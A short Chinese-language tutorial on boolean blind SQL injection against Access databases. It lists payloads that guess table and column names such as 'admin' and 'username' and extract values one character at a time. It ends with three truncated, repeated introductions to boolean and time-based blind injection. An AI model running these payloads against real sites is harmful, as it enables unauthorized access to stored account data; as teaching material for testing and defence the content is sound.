一般用於沒有回顯位,無法直接回顯資料庫內容。
有兩種語句方法:
order by 1 回顯資料庫錯誤,既不可用回顯注入。
and 1=1 返回正常
and 1=2 返回錯誤
and exists(select * from admin(猜的))返回正常既存在,報錯既不存在
and exists(select username from admin)如果admin存在的話,猜列名,username存在返回正常,不存在報錯
and (select top 1 len(username) from admin)=5猜username欄位裡面的內容長度為5
and (select top 1 asc(mid(username,1,1)) from admin)=97獲取username內容第一位字元的ascii碼為97,以此類推,一直猜到第5位字元。
and (select count() from msysobjects)>0判斷資料庫是否為access,msysobjects為access系統表,在web下無許可權訪問,報錯既表示為access資料庫。
and 0<>(select count() from admin),猜表名
and 1=(select count(*) from admin where len(username)>0)猜列名
and (select top 1 asc(mid(username,1,1)) from admin)=97
注:asc是將字元轉為ascii碼 mid是擷取字串,第乙個引數是從哪開始,第二個引數是擷取位數。
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...
SQL注入 盲注
遮蔽了報錯資訊,攻擊者無法使用報錯資訊來進行注入判斷。1.boolean 盲注 無論輸入什麼只會顯示真與假 2.時間盲注 頁面沒有任何的顯示,通過時間的延遲來判斷是否存在注入 是無論輸入什麼,結果只返回真和假兩種結果。判斷資料庫名的長度 length database x 判斷表名 substr d...